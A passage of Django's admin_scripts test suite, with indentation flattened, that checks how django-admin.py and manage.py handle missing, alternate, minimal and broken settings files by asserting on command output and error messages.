"A series of tests for django-admin.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_bad_settings(self):
"no settings: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"no settings: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
class DjangoAdminDefaultSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"default: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"default: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"default: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"default: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"default: django-admin can't execute user commands if it isn't provided settings"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"default: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"default: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminFullPathDefaultSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
contains the test application specified using a full path.
"""
def setUp(self):
self.write_settings('settings.py', ['django.contrib.auth', 'django.contrib.contenttypes',
'admin_scripts', 'admin_scripts.complex_app'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"fulldefault: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"fulldefault: django-admin builtin commands succeed if a settings file is provided"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"fulldefault: django-admin builtin commands succeed if the environment contains settings"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"fulldefault: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"fulldefault: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"fulldefault: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"fulldefault: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"fulldefault: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminMinimalSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"minimal: django-admin builtin commands fail if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_environment(self):
"minimal: django-admin builtin commands fail if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_bad_settings(self):
"minimal: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"minimal: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"minimal: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"minimal: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminAlternateSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"alternate: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"alternate: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"alternate: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminMultipleSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"alternate: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"alternate: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"alternate: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminSettingsDirectory(AdminScriptTestCase):
"""
A series of tests for django-admin.py when the settings file is in a
directory. (see #9751).
"""
def setUp(self):
self.write_settings('settings', is_dir=True)
def tearDown(self):
self.remove_settings('settings', is_dir=True)
def test_setup_environ(self):
"directory: startapp creates the correct directory"
args = ['startapp', 'settings_test']
app_path = os.path.join(test_dir, 'settings_test')
out, err = self.run_django_admin(args, 'test_project.settings')
self.addCleanup(shutil.rmtree, app_path)
self.assertNoOutput(err)
self.assertTrue(os.path.exists(app_path))
with open(os.path.join(app_path, 'apps.py'), 'r') as f:
content = f.read()
self.assertIn("class SettingsTestConfig(AppConfig)", content)
self.assertIn("name = 'settings_test'", content)
with open(os.path.join(app_path, '__init__.py'), 'r') as f:
content = f.read()
expected_content = "default_app_config = 'settings_test.apps.SettingsTestConfig'"
self.assertIn(expected_content, content)
if not PY3:
with open(os.path.join(app_path, 'models.py'), 'r') as fp:
content = fp.read()
self.assertIn(
"from __future__ import unicode_literals\n",
content,
)
def test_setup_environ_custom_template(self):
"directory: startapp creates the correct directory with a custom template"
template_path = os.path.join(custom_templates_dir, 'app_template')
args = ['startapp', '--template', template_path, 'custom_settings_test']
app_path = os.path.join(test_dir, 'custom_settings_test')
out, err = self.run_django_admin(args, 'test_project.settings')
self.addCleanup(shutil.rmtree, app_path)
self.assertNoOutput(err)
self.assertTrue(os.path.exists(app_path))
self.assertTrue(os.path.exists(os.path.join(app_path, 'api.py')))
def test_builtin_command(self):
"directory: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_bad_settings(self):
"directory: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"directory: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"directory: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_builtin_with_settings(self):
"directory: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"directory: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
##########################################################################
# MANAGE.PY TESTS
# This next series of test classes checks the environment processing
# of the generated manage.py script
##########################################################################
class ManageNoSettings(AdminScriptTestCase):
"A series of tests for manage.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: manage.py builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?(test_project\.)?settings'?", regex=True)
def test_builtin_with_bad_settings(self):
"no settings: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"no settings: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
class ManageDefaultSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: manage.py builtin commands succeed when default settings are appropriate"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_settings(self):
"default: manage.py builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"default: manage.py builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"default: manage.py builtin commands succeed if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"default: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"default: manage.py can execute user commands when default settings are appropriate"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_settings(self):
"default: manage.py can execute user commands when settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"default: manage.py can execute user commands when settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class ManageFullPathDefaultSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
contains the test application specified using a full path.
"""
def setUp(self):
self.write_settings('settings.py', ['django.contrib.auth', 'django.contrib.contenttypes', 'admin_scripts'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"fulldefault: manage.py builtin commands succeed when default settings are appropriate"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_settings(self):
"fulldefault: manage.py builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"fulldefault: manage.py builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"fulldefault: manage.py builtin commands succeed if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"fulldefault: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"fulldefault: manage.py can execute user commands when default settings are appropriate"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_settings(self):
"fulldefault: manage.py can execute user commands when settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"fulldefault: manage.py can execute user commands when settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class ManageMinimalSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: manage.py builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_settings(self):
"minimal: manage.py builtin commands fail if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_environment(self):
"minimal: manage.py builtin commands fail if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_bad_settings(self):
"minimal: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"minimal: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"minimal: manage.py can't execute user commands without appropriate settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"minimal: manage.py can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: manage.py can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class ManageAlternateSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: manage.py builtin commands fail with an error when no default settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?(test_project\.)?settings'?", regex=True)
def test_builtin_with_settings(self):
"alternate: manage.py builtin commands work with settings provided as argument"
args = ['check', '--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertOutput(out, SYSTEM_CHECK_MSG)
self.assertNoOutput(err)
def test_builtin_with_environment(self):
"alternate: manage.py builtin commands work if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'alternate_settings')
self.assertOutput(out, SYSTEM_CHECK_MSG)
self.assertNoOutput(err)
def test_builtin_with_bad_settings(self):
"alternate: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"alternate: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"alternate: manage.py can't execute user commands without settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?(test_project\.)?settings'?", regex=True)
def test_custom_command_with_settings(self):
"alternate: manage.py can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', False), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', False), ('verbosity', 1)]")
self.assertNoOutput(err)
def test_custom_command_with_environment(self):
"alternate: manage.py can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'alternate_settings')
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
self.assertNoOutput(err)
def test_custom_command_output_color(self):
"alternate: manage.py output syntax color can be deactivated with the `--no-color` option"
args = ['noargs_command', '--no-color', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', True), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', False), ('verbosity', 1)]")
self.assertNoOutput(err)
class ManageMultipleSettings(AdminScriptTestCase):
"""A series of tests for manage.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"multiple: manage.py builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_settings(self):
"multiple: manage.py builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"multiple: manage.py can execute builtin commands if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"multiple: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"multiple: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"multiple: manage.py can't execute user commands using default settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"multiple: manage.py can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"multiple: manage.py can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class ManageSettingsWithSettingsErrors(AdminScriptTestCase):
"""
Tests for manage.py when using the default settings.py file containing
runtime errors.
"""
def tearDown(self):
self.remove_settings('settings.py')
def write_settings_with_import_error(self, filename):
settings_file_path = os.path.join(test_dir, filename)
with open(settings_file_path, 'w') as settings_file:
settings_file.write('# Settings file automatically generated by admin_scripts test case\n')
settings_file.write('# The next line will cause an import error:\nimport foo42bar\n')
def test_import_error(self):
"""
import error: manage.py builtin commands shows useful diagnostic info
when settings with import errors is provided (#14130).
"""
self.write_settings_with_import_error('settings.py')
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named")
self.assertOutput(err, "foo42bar")
def test_attribute_error(self):
"""
manage.py builtin commands does not swallow attribute error due to bad
settings (#18845).
"""
self.write_settings('settings.py', sdict={'BAD_VAR': 'INSTALLED_APPS.crash'})
args = ['collectstatic', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "AttributeError: 'list' object has no attribute 'crash'")
def test_key_error(self):
self.write_settings('settings.py', sdict={'BAD_VAR': 'DATABASES["blah"]'})
args = ['collectstatic', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "KeyError: 'blah'")
def test_help(self):
"""
Test listing available commands output note when only core commands are
available.
"""
self.write_settings('settings.py', sdict={'MEDIA_URL': '"/no_ending_slash"'})
args = ['help']
out, err = self.run_manage(args)
self.assertOutput(out, 'only Django core commands are listed')
self.assertNoOutput(err)
class ManageCheck(AdminScriptTestCase):
def tearDown(self):
self.remove_settings('settings.py')
def test_nonexistent_app(self):
""" manage.py check reports an error on a non-existent app in
INSTALLED_APPS """
self.write_settings('settings.py',
apps=['admin_scriptz.broken_app'],
sdict={'USE_I18N': False})
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'ImportError')
self.assertOutput(err, 'No module named')
self.assertOutput(err, 'admin_scriptz')
def test_broken_app(self):
""" manage.py check reports an ImportError if an app's models.py
raises one on import """
self.write_settings('settings.py', apps=['admin_scripts.broken_app'])
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'ImportError')
def test_complex_app(self):
""" manage.py check does not raise an ImportError validating a
complex app with nested calls to load_app """
self.write_settings(
'settings.py',
apps=[
'admin_scripts.complex_app',
'admin_scripts.simple_app',
'django.contrib.admin.apps.SimpleAdminConfig',
'django.contrib.auth',
'django.contrib.contenttypes',
],
sdict={
'DEBUG': True
}
)
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(err)
